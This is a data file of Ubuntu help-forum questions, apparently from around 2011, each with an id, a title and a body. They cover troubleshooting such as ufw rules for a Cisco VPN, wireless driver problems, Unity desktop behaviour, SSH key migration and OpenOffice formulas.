45202	how to connect to a cisco vpn through ufw	i am running ubuntu 11.04 ( 64 bits version ) and would like to be able to get connected to the vpn server ( cisco ) of my company . i am able to get connected to the vpn server when i disable ufw but , despite various attempts , i could n't find the proper rules to enter in ufw in order to mediate this connection when ufw is enabled ( network-manager keep on saying that my connection failed ) . i have the following packages installed : vpnc network-manager-vpnc network-manager-pptp network-manager-pptp-gnome network-manager-vpnc-gnome pptp-linux here are my ufw rules : 443/tcp allow anywhere 143 allow anywhere samba allow anywhere 53,137,138/udp allow out anywhere 20,21,22,25,80,139,443,5900,8001/tcp allow out anywhere 23399 allow out anywhere 19294/tcp allow out anywhere 19295/udp allow out anywhere 19302/udp allow out anywhere 1863,5222,5223,6667,8010/tcp allow out anywhere 6891:6900,6901/udp allow out anywhere 6891:6900,6901/tcp allow out anywhere 15399 allow out anywhere 5269/tcp allow out anywhere 993/tcp allow out anywhere 587/tcp allow out anywhere anywhere deny out anywhere while running 10.10 and firestarter , i was able to get connected to the same vpn server after having entered the following lines in /etc/firestarter/user-pre : iptables -a input -j accept -s xxx.xxx.xx.xxx -p esp iptables -a input -j accept -s xxx.xxx.xx.xxx -p udp -m multiport -- sports isakmp,10000 iptables -a input -j accept -i tun+ iptables -a output -j accept -d xxx.xxx.xx.xxx -p esp iptables -a output -j accept -d xxx.xxx.xx.xxx -p udp -m multiport -- dports isakmp,10000 iptables -a output -j accept -o tun+ ( the xxx.xxx.xxx.xxx being replaced by my server 's ip address ) thus , what are the proper rules to enter in ufw to match the ones which used to work when running firestarter as a firewall ? more generally , which settings should i use in ufw to get the connection working ?
45203	how can i assign a middle button press to a specific key in my laptop ?	how can i attach a middle button press to a specific key in my laptop ? i can do middle-button if i tap on the top right corner of the touchpad , but i would like to associate it to a key , like the `` windows '' key or the `` menu '' key . is there a way to do that ? the current answer does n't work for ubuntu 11.10 with a classic gnome-failsafe desktop . i would need someone to figure out how can this be done for the updated ubuntu version .
45204	any ways to make unity pop up faster/better ?	the unity bar on the left side of the screen does n't pop up correctly when moving the pointer to the left side of the screen . it frequently does n't pop up , especially when it 's been popped up few seconds ago . in those cases , i have to move the pointer to the center of the screen , and go back to the left side again . of course , i can hold the super-key , but that 's not what i 'm looking for . i 'm also looking for ways to make the bar pop up faster in general : it would be great if the speed could be user-defined , just like the alt-tab-window-switching speed can be modified in compizconfig . right now , in my opinion , it pops up too slowly . any help would be greatly appreciated . thanks , exeleration-g
45205	kubuntu 11.04 wireless scan does n't find network	when i scan for networks in the network manager i do not find any . i have a broadcom wireless card . my light on my laptop is n't blue and blue is the color when it is on ( yes i have the switch in the on position ) . running sudo ifconfig wlan0 up i get `` siocsifflags : no such file or directory '' ifconfig -a returns ( i removed some of the mac ) `` wlan0 link encap : ethernet hwaddr 00:14 : a5 : ad : ** : ** broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) '' so the driver i 'm assuming is there is a driver and rfkill is the following rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : hp-wifi : wireless lan soft blocked : no hard blocked : no in the network interfaces gui it does not list the wlan0 though . anyone have a clue as to what is going on . i 've looked around and ca n't find much on this issue . i have other wireless devices finding and connecting to the router .
45208	how can i install 'restricted-extras ' offline ?	i currently do n't have internet access in the house which means i have to go the cafe after a fresh 11.04 install , can anyone provide a link where i can get a .deb package ( amd64 ) of ubuntu-restricted-extras for 11.04 ?
45215	gnome-shell no longer a login menu selection	i am running gnome 3 on top of an ubuntu 11.04 install . everything had been running fine , but some updates i applied required my rebooting the box to finish the install . upon restarting everything came up fine , except gnome-shell is no longer in the selection list at the login dialog . if i log into either unity or gnome classic , i can do open a shell and run gnome-shell -- replace , and things are back to how i had them . i just do n't understand what may have happened to cause this ? . any ideas , or is the unity community just mad folk are switching to gnome 3 away from unity and they are trying to make things a bit more difficult : ) either way , thanks for any help that can be afforded tom
45216	launcher and panel disappeared after enabling wobbly windows and desktop cube effects	i updated to ubuntu 11.04 , and simultaneously enabled the wobbly windows effect and the desktop cube effect in ccsm . after i restarted ubuntu , the panel and launcher disappeared and the screen went into fullscreen mode . i am unable to open any files ; i can only see a desktop screen .
45217	dont dim desktop when asking password for administrative changes	is there an option to turn off dimming the desktop when asking/prompting the password for administrative tasks ? like in windows user account control . it hurts my eyes everytime it dims my desktop instantly .
45218	certificate logins to servers	i have some ubuntu cloud servers running and has the iptable rules applied on them to allow only few ip addresses to connect via ssh . i know how to generate ssh-key for connecting to server with/without passphrase . my manager is asking if there is any some sort of certification login which allows to connect to the cloud computers which does n't require changing iptable rules everytime . does anyone know this with ssh or with something ? . please let me know ...
45223	error messages shown while booting ubuntu 11.04	i see the following messages on booting . my system works fine . i have disabled the plymouth theme and i am using text boot only udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:10 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:12 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:14 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:17 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:19 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:21 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:23 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:26 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:28 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:30 ^m udevd [ 343 ] : sysfs { } = will be removed in a future udev version , please use attr { } = to match the event device , or attrs { } = to match a parent device , in /etc/udev/rules.d/80-canon_mfp.rules:32
45227	how to make banshee copy files to my creative zen mp3 player as mp3 instead of flac	when i try to use banshee to copy files from to my creative zen stone mp3 player it keeps converting the files from mp3 to flac . it detects the player fine and copies files to it fine . syncs to a playlist fine . but the only option i have under `` device properties '' is flac . there is no mp3 option for encoding . so instead of just copying the files it encodes them from mp3 to flac and then copies the flac files . i have the gstreamer multiverse ugly package installed from synaptic already and mp # files play fine ( most of my collection is mp3 ) is there something i am missing , a package i need to install that will let me sync mp3 files to my mp3 player as mp3 's ? i already have ubuntu-restricted-extras installed
45231	how to make webm desktop recordings ?	i am looking for either a desktop recorder/screencast application that can output in webm format , or a program that can convert the .ogv format generated by gtk-recordmydesktop into webm . i have selected webm as the format i need because it seems to be the only free codec supported by youtube , where my recordings will end up . i 've tried uploading an .ogv in the past and got solid green video , so that wo n't work for me . i live in the usa and i am conscious about trying to stay away from anything that might have software patent issues , like gstreamer0.10-plugins-ugly or gstreamer0.10-plugins-bad . it was for this reason i was originally interested in tibesti ( for example ) , but that needed the installation of packages like the aforementioned . i 've done some searching online for a free ( as in both money and freedom ) solution , but so far could n't find anything . any suggestions ?
45233	freeze when resuming from screensaver or monitor-sleep-state	i 've installed natty on an older samsung desktop at work . it 's a shared machine that needs no screen-locking , passwords , or anything else . ( perhaps it should have those features , but nobody would use it then . ) anyway , after the screensaver is activated , and subsequently deactivated , the interface often ( though not always ) freezes . by `` freeze , '' i mean that while the mouse pointer moves on the screen , the system ( unity , perhaps ? ) does n't respond to clicks or normal keyboard input ( ctrl+alt+f1 does work , however ) . additionally , the clock in the panel stops updating and continues to display the time at which the freeze occurred ( which appears to be during the time the screensaver was active ) . the only way i 've found to recover is to issue sudo service gdm restart . after discovering this problem , i disabled the screensaver . that seemed to cure the problem for a while , but now it 's back , showing up after the monitor has gone to sleep . i thought someone had fiddled with the settings , but it 's unlikely anyone would do so , and i could n't find anything amiss . any idea what 's causing this problem and how to fix it ?
45237	how can i fix the ugly fonts in java applications ?	in natty , and maybe since ubuntu is using the ambiance theme by default , it seems java applications have a problem with fonts . this screen is easily reproducible by starting this webstart application and selecting the gtk look and feel . the only exception is eclipse which shows perfectly standard menu and fonts . every other java application using ambiance through the gtk style shows this ugly rendering . is there any way to fix this ?
45238	how can i know the usernames connected to my system ?	is there a way to know how to catch the username of the users connected to my system ? so , i 've a wifi router with a wep key setted , me and friend are making some test . considered that my friend has encrypted the key and use my network , is it possible to know using him ip and mac address detecting his username ? ? he also use an ubuntu . thanks a lot ! ! !
45241	mount drive through command line ( as if i clicked on it in nautilus )	i 'm writing a backup script in which i need to mount a drive in the media bay of my laptop . i know that i can get the job done by messing with fstab and the mount command . perhaps that 's the easiest way . anyway , i 'm interested in the following : initially the media bay drive is unmounted . ( screen shot 1 , screen shot 2 ) i click on the drive in the side-panel in a nautilus window and the drive is mounted . ( screen shot ) i can access it at /media/baydrive ( screen shot ) my question : is there an easy way of performing step 2 from the command line ? i.e. , mount the drive to /media/ < device name > without messing with fstab .
45242	how do i use bold font in terminal ? ( echo/cat )	how can i make some output bold in ubuntu terminal echo `` text bold text '' text bold text or the same from cat my_file
45249	which ubuntu packages are considered genuine ?	i tried to report a bug issue on update manager but got the following error : your problem can not be reported . this is not a genuine ubuntu package . is n't ubuntu open source ?
45253	update messed up my computer ( again )	i just ran updates as usual , trusting ubuntu repositories are fine . but as i started up my computer again it was completely messed up . the log-in screen is blue , the interface is all squarish , everything changed and a black area replaces my dock . what the heck just happened ? i already had such an episode in 10.10 which messed up all my computer . how can i remove whatever has been installed by this update and reinstall whatever has been remove ? screenshot 1 : screenshot 2 : here is my var/log/apt/history.log : start-date : 2011-05-26 11:06:36 upgrade : policykit-1-gnome : i386 ( 0.99-1ubuntu4 , 0.101-2ubuntu3~natty1 ) , libqt4-opengl : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libpolkit-gobject-1-0 : i386 ( 0.101-1ubuntu1 , 0.101-4~natty1 ) , telepathy-salut : i386 ( 0.4.0-1 , 0.5.0-1~natty1 ) , libqt4-declarative : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libtelepathy-glib0 : i386 ( 0.14.3-1ubuntu1 , 0.14.6-0ubuntu1~natty~build1 ) , avahi-daemon : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , cairo-dock-plug-ins-integration : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , libavahi-common-data : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , libqt4-test : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , glib-networking : i386 ( 2.28.5-0ubuntu1 , 2.28.6.1-0ubuntu1 ) , libqt4-sql-mysql : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libqt4-dbus : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , cairo-dock : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , libibus2 : i386 ( 1.3.9-0ubuntu3 , 1.3.9-0ubuntu4~gtk3 ) , ibus-gtk : i386 ( 1.3.9-0ubuntu3 , 1.3.9-0ubuntu4~gtk3 ) , gnome-menus : i386 ( 2.30.5-0ubuntu3 , 3.0.0-0ubuntu1 ) , libpam-gnome-keyring : i386 ( 2.92.92.is.2.32.1-0ubuntu2 , 3.0.2-1~natty2 ) , gir1.2-soup-2.4 : i386 ( 2.34.0-0ubuntu1 , 2.34.2-1~natty1 ) , libtotem-plparser17 : i386 ( 2.32.4-0ubuntu1 , 2.32.4-3~natty1 ) , libnotify4 : i386 ( 0.7.2-0ubuntu2 , 0.7.3-1~natty1 ) , cairo-dock-plug-ins : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , policykit-1 : i386 ( 0.101-1ubuntu1 , 0.101-4~natty1 ) , libgnome-menu2 : i386 ( 2.30.5-0ubuntu3 , 3.0.0-0ubuntu1 ) , libsoup2.4-1 : i386 ( 2.34.0-0ubuntu1 , 2.34.2-1~natty1 ) , libmission-control-plugins0 : i386 ( 5.7.7-1 , 5.7.11-1~natty1 ) , avahi-utils : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , gsettings-desktop-schemas : i386 ( 3.0.0-0ubuntu1 , 3.0.1-1~natty1 ) , network-manager-gnome : i386 ( 0.8.4~git.20110318t152954.9c4c9a0-0ubuntu1 , 0.8.4~git.20110318t152954.9c4c9a0-0ubuntu1+noindicator1~build1 ) , libgnome-bluetooth8 : i386 ( 2.91.2.is.2.32.0-0ubuntu3 , 3.0.0-1ubuntu1~natty1 ) , cairo-dock-data : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , libpolkit-gtk-1-0 : i386 ( 0.99-1ubuntu4 , 0.101-2ubuntu3~natty1 ) , libgnomekbd-common : i386 ( 2.32.0-0ubuntu1 , 3.0.0.1-1~natty1 ) , libqt4-xmlpatterns : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , gir1.2-freedesktop : i386 ( 0.10.7-0ubuntu1 , 0.10.8-1ubuntu1~natty1 ) , libqt4-help : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , gnome-orca : i386 ( 3.0.0-0ubuntu2 , 3.0.2-0ubuntu1~natty~build1 ) , python-avahi : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , libstartup-notification0 : i386 ( 0.10-1build1 , 0.12-1~natty1 ) , libgdata11 : i386 ( 0.8.0-0ubuntu1 , 0.8.1-1~natty1 ) , libgdu0 : i386 ( 2.32.1-0ubuntu4 , 3.0.0-1ubuntu1~natty1 ) , cairo-dock-core : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , libqtcore4 : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libavahi-gobject0 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , libegroupwise1.2-13 : i386 ( 2.32.2-0ubuntu2 , 3.0.0-1ubuntu1~natty1 ) , gir1.2-glib-2.0 : i386 ( 0.10.7-0ubuntu1 , 0.10.8-1ubuntu1~natty1 ) , libtelepathy-logger2 : i386 ( 0.2.6-1ubuntu1 , 0.2.9-1~natty1 ) , telepathy-idle : i386 ( 0.1.8-1ubuntu1 , 0.1.10-1~natty1 ) , libgweather-common : i386 ( 2.30.3-1ubuntu1 , 3.0.0-0ubuntu1~natty1 ) , libecal1.2-8 : i386 ( 2.32.2-0ubuntu2 , 3.0.0-1ubuntu1~natty1 ) , avahi-autoipd : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , rdesktop : i386 ( 1.6.0-3ubuntu4 , 1.6.0-3ubuntu4.1 ) , libedataserver1.2-14 : i386 ( 2.32.2-0ubuntu2 , 3.0.0-1ubuntu1~natty1 ) , vino : i386 ( 2.32.1-0ubuntu2.1 , 3.0.2-0ubuntu4~natty1 ) , mousetweaks : i386 ( 3.0.0-0ubuntu2 , 3.0.2-0ubuntu1~natty~build2 ) , gir1.2-notify-0.7 : i386 ( 0.7.2-0ubuntu2 , 0.7.3-1~natty1 ) , telepathy-mission-control-5 : i386 ( 5.7.7-1 , 5.7.11-1~natty1 ) , libqt4-sql : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , telepathy-logger : i386 ( 0.2.6-1ubuntu1 , 0.2.9-1~natty1 ) , libqt4-svg : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , telepathy-gabble : i386 ( 0.11.10-1ubuntu1 , 0.12.0-1~natty1 ) , libqt4-xml : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libsoup-gnome2.4-1 : i386 ( 2.34.0-0ubuntu1 , 2.34.2-1~natty1 ) , libqt4-network : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libqt4-designer : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , gnome-icon-theme : i386 ( 2.31.0-0ubuntu2 , 3.0.0-1ubuntu1~natty1 ) , libavahi-client3 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , ibus : i386 ( 1.3.9-0ubuntu3 , 1.3.9-0ubuntu4~gtk3 ) , libqtgui4 : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , librsvg2-2 : i386 ( 2.32.1-0ubuntu3 , 2.34.0-0ubuntu2~natty2 ) , libpolkit-backend-1-0 : i386 ( 0.101-1ubuntu1 , 0.101-4~natty1 ) , libxklavier16 : i386 ( 5.0-2ubuntu1 , 5.1-1ubuntu1~natty1 ) , python-gmenu : i386 ( 2.30.5-0ubuntu3 , 3.0.0-0ubuntu1 ) , libavahi-glib1 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , telepathy-butterfly : i386 ( 0.5.15-1 , 0.5.15-2.1~natty1 ) , yelp-xsl : i386 ( 3.0.0-0ubuntu1 , 3.0.2-1~natty1 ) , libqt4-script : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , cairo-dock-plug-ins-data : i386 ( 2.3.1~0alpha0~20110506-0ubuntu1~ppa0~natty , 2.3.1~0alpha0~20110519-0ubuntu1~ppa0~natty ) , libnautilus-extension1 : i386 ( 2.32.2.1-0ubuntu13 , 3.0.2-0ubuntu1~natty1 ) , libqt4-scripttools : i386 ( 4.7.2-0ubuntu6 , 4.7.2-0ubuntu6.1 ) , libavahi-common3 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , python-ibus : i386 ( 1.3.9-0ubuntu3 , 1.3.9-0ubuntu4~gtk3 ) , binutils : i386 ( 2.21.0.20110327-2ubuntu2 , 2.21.0.20110327-2ubuntu3 ) , libavahi-ui0 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , librsvg2-common : i386 ( 2.32.1-0ubuntu3 , 2.34.0-0ubuntu2~natty2 ) , libavahi-core7 : i386 ( 0.6.30-0ubuntu2 , 0.6.30-3ubuntu1~natty1 ) , libpolkit-agent-1-0 : i386 ( 0.101-1ubuntu1 , 0.101-4~natty1 ) , libgdata-common : i386 ( 0.8.0-0ubuntu1 , 0.8.1-1~natty1 ) end-date : 2011-05-26 11:09:41 here is the unity-support test output : ~ $ /usr/lib/nux/unity_support_test -p opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) 965gm gem 20100330 development x86/mmx/sse2 opengl version string : 2.1 mesa 7.10.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity supported : yes
45254	how to delete a second swap partition safely ?	first of all i 've tried to install ubuntu , but something went wrong and the installation was interrupted . then i tried to install again , and it was installed successfully . and there was another partition about 600 mb , but i removed it using disk utility .and i had to restore grub from a live cd . but why is /dev/sda4 now extended and contains 2 linux swap ? and how can i remove the other linux swap ? and how to make it one linux partition with one swap ? when i try to remove /dev/sda5 please unmount any logical partitions having a number higher than 5 .
45255	why is n't document viewer 2.32.0 using subpixel rendering ?	adobe reader : document viewer :
45263	fglrx does n't show in additional drivers	i have dell studio 15 with ati mobility hd 4500 series graphics card . in ubuntu 10.10 i used the flgrx driver which i installed from the additional drivers program , i need this because the open source driver runs my computer dangerously hot . in 11.04 fglrx is not available in the additional drivers program . why is fglrx not showing in additional drivers and how do i install it ?
45264	moving ssh keys from ubuntu	i have set up ssh keys on my ubuntu machine ( 10.04 ) and now i am moving to debian . on the debian machine , do i generate new ssh keys corresponding to my username or is it possible to ( and is ok ) if i copy the ~/.ssh folder from ubuntu and place it in the new debian installation ? long story short , how do i move around my ssh keys .
45266	how can i configure the network on my kubuntu box to be a system connection	i would love to know how to configure kubuntu to not use the networkmanager so that i can go back to the old way of configuring a static ip in /etc/network/interfaces . can anyone help me with this ? i find the userspace plasma widget for configuring the network completely useless . i do n't want to have to log into kde in order for the network to come up , i just want a system wide , wired connection . can anyone help with a little advice please ?
45268	( mpx ) multi pointer x on 10.04 and beyond ?	i 've read articles about multi pointer x on ubuntu , and just wanted to know if it has got to a stable stage yet where it can easily be enabled on 10.04+ ? if yes , how can i enable it ?
45270	prevent unity from auto-maximizing	possible duplicates : is there a way to turn off âauto-maximizeâ ? how to keep programs from launching maximized ? 11.04 on a small netbook screen , it 's useful to have windows maximized by default . however , on two separate machines with full-sized screens , unity does n't seem to realize that always opening browser windows maximized is just annoying . how can i teach unity the error of its ways ? on a full-sized screen , i do n't want unity to auto-maximize any window , unless i happen to configure it to do so for a particular window ( which is unlikely ) . ( by the way , i 'm running natty . )
45277	how to merge the cells in openoffice ?	how to merge two columns in open office ? for example i have the following datas in cloumns as follows . a1 10 | b1 10 a2 11 | b2 20 a3 12 | b3 30 a4 13 | b4 40 is it possible to merge these two columns into one . so that i should get the output like you see below , a1 1010 a2 1120 a3 1230 a4 1340 any help will be appreciated , thanks in advance .
45278	skype 2.2.0.25 keeps going off	after my computer crashed , my skype does n't stay on anymore . i start it , the windows openes up , but after 5 seconds skype exits again by itself . already reinstalled it 4 times : ( i 'd appreciat
45290	do n't lock the computer when i press sleep	i have an automatic login and no screensaver password . i would easily have no password at all , but i am keeping it for the things that require root in hope of using alternative methods to get my convenience . i removed the password from my keyring , because it does not get unlocked during the automatic login . i do n't store anything in my keyring except some personal music and personal email anyway , also i am tech savvy and am more capable of protecting my computer than most . the one place that still annoys me is when i put the computer to sleep and come back the next day , it asks for a password . i do this whenever i have a multi-day project i am working on ( i am a programmer ) , so i do n't have to launch all my windows back . how can i have an automatic login when the computer wakes up from sleep ?
45296	how to convert floating point value into decimal value in open office ?	in spreadsheet i have more than 5 columns , every columns showing its own value . one of the column shows the talk time as follows , 60:00 06:44 08:48 59:13 i just want to round up this values , as follows . 60 07 09 59 for example 01:25 if the talktime is equal to & above 25seconds it should be rounded as 02 but if the talktime is 01:13 then it should round it as 01 and not as 02 .
45297	how to setup a wireless access-point using my laptops wifi card ?	i want to share my laptops ( running ubuntu 10.10 ) broadband with my android ( galaxy mini ) running 2.2.1 . since androids currently do not support ad-hoc networks so the `` create new wireless network.. '' wo n't help . q1 ) how do i setup a wireless access point using my laptops wifi card ? q2 ) what is the difference between an `` ad-hoc '' network and an `` access point '' ? **abdulkarim @ ak-laptop** : ~ $ lspci | grep ireless 03:00.0 network controller : atheros communications inc. ar9287 wireless network adapter ( pci-express ) ( rev 01 ) iw list wiphy phy0 band 1 : capabilities : 0x11ce ht20/ht40 sm power save disabled rx ht40 sgi tx stbc rx stbc 1-stream max amsdu length : 7935 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 8 usec ( 0x06 ) ht tx/rx mcs rate indexes supported : 0-15 frequencies : * 2412 mhz [ 1 ] ( 20.0 dbm ) * 2417 mhz [ 2 ] ( 20.0 dbm ) * 2422 mhz [ 3 ] ( 20.0 dbm ) * 2427 mhz [ 4 ] ( 20.0 dbm ) * 2432 mhz [ 5 ] ( 20.0 dbm ) * 2437 mhz [ 6 ] ( 20.0 dbm ) * 2442 mhz [ 7 ] ( 20.0 dbm ) * 2447 mhz [ 8 ] ( 20.0 dbm ) * 2452 mhz [ 9 ] ( 20.0 dbm ) * 2457 mhz [ 10 ] ( 20.0 dbm ) * 2462 mhz [ 11 ] ( 20.0 dbm ) * 2467 mhz [ 12 ] ( 20.0 dbm ) ( passive scanning ) * 2472 mhz [ 13 ] ( 20.0 dbm ) ( passive scanning ) * 2484 mhz [ 14 ] ( disabled ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 4 supported interface modes : * ibss * managed * ** ap * ap/vlan** * monitor * mesh point supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * unknown command ( 55 ) * unknown command ( 57 ) * unknown command ( 59 ) * set_wiphy_netns * unknown command ( 65 ) * connect * disconnect
45299	how can i share the host ubuntu machine desktop to guest windows machine	i installed virtualbox on my physical machine : linux ubuntu 10.04 oracle virtualbox 4.0.8 in virtualbox i hosted windows xp sp3 question : how can i share the host ubuntu machine desktop to guest windows machine .
45301	possible to have 2 unity launchers ?	is it possible to have 2 unity launchers ? one on the left and one on the right . in my thoughts , the left one ( the default ) would have the normal stuff that i use everyday . the right side would have additional stuff that i might use like wine programs or to show the recent documents . just some ideas to my reason to having 2 panels . is it possible/optional ?
45307	show desktop ctrl-alt-d stopped working for firefox only . why ? how to fix ?	i do n't know why but show desktop ctrl-alt-d suddenly stopped working for firefox only ( in all workspaces ) . any ideas what might have caused this ? thank you all ! ps : alt-space-n or ctrl-alt-arrow_key both continue to function normally ( as a quick and effective work-around ) . pps : in keyconfig i ca n't see any addon using this combination ; plus , i did not install a new addon recently ...
45308	access to my files on android	i am thinking of subscribing to dropbox which is slightly more costly than ubuntu one but i need access to my files on the go , and i prefer to use my smartphone to my netbook most of the time as i like to travel light . i do not want to stream music , i want access to my files only . whereas there is a free app for dropbox to access said files , there is n't one for ubuntu . i would be prepared to wait a while if you have got this in hand , have you actually given this any thought ? please tell me whether i should ignore ubuntu one and link up with dropbox ?
45315	what do i need to have gui to auto detect & connect to wireless network	i am on lxde + minimal ubuntu for sometime . i am lost at how to troubleshoot or connect to wireless networks . so i am looking for a gui tool , perhaps light-weight & relatively easy to use , that works with lxde . it should handle listing of wireless networks & allow me to connect to them easily . it should also allow me to default to a wireless network when i startup my pc too . update : network-manager-gnome & nm-applet this seems to be one way . but i ca n't seem to have nm-applet start on boot . i tried sudo cp /etc/xdg/autostart/nm-applet.desktop ~/.config/autostart/ then reading another article , edited /etc/xdg/autostart/nm-applet.desktop onlyshowin=lxde ; since i am using lxde . but it still wont start ...
45321	how to get device id	i am using ubuntu 11.04 on my system . i want to disable the touchpad of the laptop , and for that i need the device id . can anybody explain how to find the device id of my device ?
45327	xkb error on a macbook pro 4.1 causes keyboard problems	i have just installed the newest version of the ubuntu on my macbook pro . right from the start , after i had done the upgrade , the os showed a error window with the following message : error activating xkb configuration . it can happen under various circumstances : • a bug in libxklavier library • a bug in x server ( xkbcomp , xmodmap utilities ) • x server with incompatible libxkbfile implementation x server version data : the x.org foundation 11001000 if you report this situation as a bug , please include : • the result of xprop -root | grep xkb • the result of gconftool-2 -r /desktop/gnome/peripherals/keyboard/kbd here are the results of the commands in the last two lines : - xprop -root | grep xkb : _xkb_rules_names_backup ( string ) = `` evdev '' , `` applealu_ansi '' , `` pt '' , `` mac '' , `` grp : shift_caps_toggle , grp_led : caps '' _xkb_rules_names ( string ) = `` evdev '' , `` applealu_ansi '' , `` pt '' , `` mac '' , `` grp : shift_caps_toggle , grp_led : caps '' - gconftool-2 -r /desktop/gnome/peripherals/keyboard/kbd layouts = [ pt mac , pt ] model = options = [ ] plus the keyboard is all messed up ! and i tried to change the keyboard layout and configuration , but it shows the same error message . i dont know if there is anyone with the same problem . thanks in advance !
45332	how to copy one file to multiple filenames ?	the command touch { jan , feb , mar } - { rep.xls , graph.xls } creates files i ca n't open : feb-graph.xls jan-rep.xls feb-rep.xls mar-graph.xls jan-graph.xls mar-rep.xls so i created one template file 1.ods , saved with oo-calc . then i tried to copy this file using cp again in the same fashion as cp : cp 1.ods { jan , feb , mar } { rep.ods , graph.ods } but that doesnt work : cp : target `margraph.ods ' is not a directory how do i copy a single file to multiple files ?
45335	how can i upload songs into google music ?	i 'm interested in using google play for music , how can i use it in ubuntu ?
45343	how to install adium theme for pidgin ?	i searched google and realized that they only made tutorial ( install adium theme for pidgin ) in ubuntu 9.10 or 10.4 . i try their tutorial in my maverick but unsuccessful . i see that in menu tool > plugin of pidgin i can not find item webkit message styles to check/uncheck . anyone has succeeded in installing adium theme for pidgin in maverick , tell me the way to do . thanks in advance .
45344	vlc sometimes mutes sound and the image freezes	i 've got problem with vlc . i mean when i play movies sometimes sound silents and then suddenly image freezes mouse to and everything else also . do you think it could be hardware problem ? ( it does n't happen on other players )
